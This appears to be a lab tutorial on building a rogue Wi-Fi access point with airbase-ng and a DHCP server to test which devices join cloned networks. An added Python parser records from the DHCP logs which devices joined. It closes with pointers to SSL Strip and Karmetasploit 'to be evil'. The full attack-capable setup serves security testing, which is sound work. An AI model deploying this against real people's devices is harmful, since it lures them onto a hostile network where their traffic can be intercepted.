The purpose of this tutorial was to create a fake access point in my lab which clones all accessible wifi networks in the area, without authentication, in order to test whether different devices (Windows, Android, Linux) are willing to join a malicious wifi access point and whether they are vulnerable or not.
I used my Lenovo x230 notebook with the built-in wifi card, as I did not want innocent people outside my apartment to be able to join my network. I could have used MAC address filtering as well, but did not want to waste time with that. I used Backtrack 5 R3 x64 Gnome as the operating system.
My fake AP IP address will be: 10.0.0.1
My network interface name is: wlan0
We need several things in order to perform the task:
Set up the DHCP server
Get the server package from the repository, stop it after install, save a backup of the original configuration and create our own config file:
apt-get install dhcp3-server
/etc/init.d/dhcp3-server stop    # the init script is named after the package (dhcp3-server), not "dhcpd"
cd /etc/dhcp3/
cp dhcpd.conf dhcpd.conf.orig
nano /etc/dhcp3/dhcpd.conf
I also like to remove DHCP from autostart:
update-rc.d -f dhcp3-server remove
Put the following contents into the file:
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
}
Now we are ready to go. First we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then we use airbase-ng to start a new network.
airmon-ng
airmon-ng start wlan0
airbase-ng -P -C 30 -e "FreeWifi" -v mon0
-P = respond to all probes
-C 30 = enable beaconing of probed ESSID values (in seconds)
-e / --essid = specify a single (initial) ESSID
-v = verbose
mon0 = our virtual monitor mode interface
Airbase-ng creates a tap interface named "at0", so you have to configure it and set the MTU size:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
Now let's start the DHCP server:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0    # -cf is the config file, -pf the PID file
You can check if the DHCP is running with the following command:
ps aux | grep dhcpd
Result should be something like this:
OUTPUT: dhcpd 2956 0.0 0.0 19632 3008 ? Ss 11:00 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0
Now in a new window I like to see the leased IP addresses:
tail -f /var/log/messages | grep dhcpd
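Added example, not part of the original tutorial: a small Python parser for the dhcpd syslog lines that the tail/grep above shows, so the lab result (which test devices only probed the fake AP and which actually took an address from it) is recorded per MAC instead of read off the terminal. The log lines are constructed samples in ISC dhcpd's syslog format; MAC addresses and hostnames are made up.

```python
import re

# Constructed sample of /var/log/messages lines, in the format ISC dhcpd
# logs through syslog; MAC addresses and hostnames are made up.
SAMPLE_LOG = """\
Mar  3 11:02:14 bt dhcpd: DHCPDISCOVER from 00:11:22:aa:bb:cc via at0
Mar  3 11:02:15 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:11:22:aa:bb:cc (android-1234) via at0
Mar  3 11:02:15 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:11:22:aa:bb:cc (android-1234) via at0
Mar  3 11:02:15 bt dhcpd: DHCPACK on 10.0.0.100 to 00:11:22:aa:bb:cc (android-1234) via at0
Mar  3 11:03:40 bt dhcpd: DHCPDISCOVER from 00:11:22:dd:ee:ff via at0
Mar  3 11:03:41 bt dhcpd: DHCPOFFER on 10.0.0.101 to 00:11:22:dd:ee:ff via at0
Mar  3 11:03:41 bt dhcpd: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 00:11:22:dd:ee:ff via at0
Mar  3 11:03:41 bt dhcpd: DHCPACK on 10.0.0.101 to 00:11:22:dd:ee:ff via at0
Mar  3 11:05:09 bt dhcpd: DHCPDISCOVER from 00:11:22:12:34:56 via at0
Mar  3 11:05:30 bt kernel: unrelated line that the parser must ignore
"""

TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dhcpd: "
MAC = r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
DISCOVER_RE = re.compile(TS + r"DHCPDISCOVER from " + MAC + r" via (?P<iface>\S+)$")
ACK_RE = re.compile(TS + r"DHCPACK on (?P<ip>[\d.]+) to " + MAC
                    + r"(?: \((?P<host>[^)]*)\))? via (?P<iface>\S+)$")

def parse_dhcp_log(log_text, iface="at0"):
    """Map each client MAC seen on `iface` to when it first asked for an
    address, the address it was ACKed and the hostname it announced.
    A DISCOVER alone means the device probed; an ACK means it joined."""
    clients = {}
    for line in log_text.splitlines():
        m = DISCOVER_RE.match(line)
        if m and m.group("iface") == iface:
            clients.setdefault(m.group("mac"), {"first_seen": m.group("ts"),
                                                "ip": None, "host": None, "joined": False})
            continue
        m = ACK_RE.match(line)
        if m and m.group("iface") == iface:
            c = clients.setdefault(m.group("mac"), {"first_seen": m.group("ts"),
                                                    "ip": None, "host": None, "joined": False})
            c.update(ip=m.group("ip"), host=m.group("host"), joined=True)
    return clients

def joined_clients(log_text, iface="at0"):
    """Sorted MACs that completed the exchange, i.e. the devices that
    actually associated with the test AP and took an address from it."""
    return sorted(mac for mac, c in parse_dhcp_log(log_text, iface).items() if c["joined"])
```

Feed it the real file with `parse_dhcp_log(open("/var/log/messages").read())`; a device that appears in `joined_clients` is one that accepted the open, cloned-SSID network, which is exactly the behaviour this lab sets out to measure.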
To be evil, follow the SSL Strip instructions:
To be evil, follow the Karmetasploit instructions: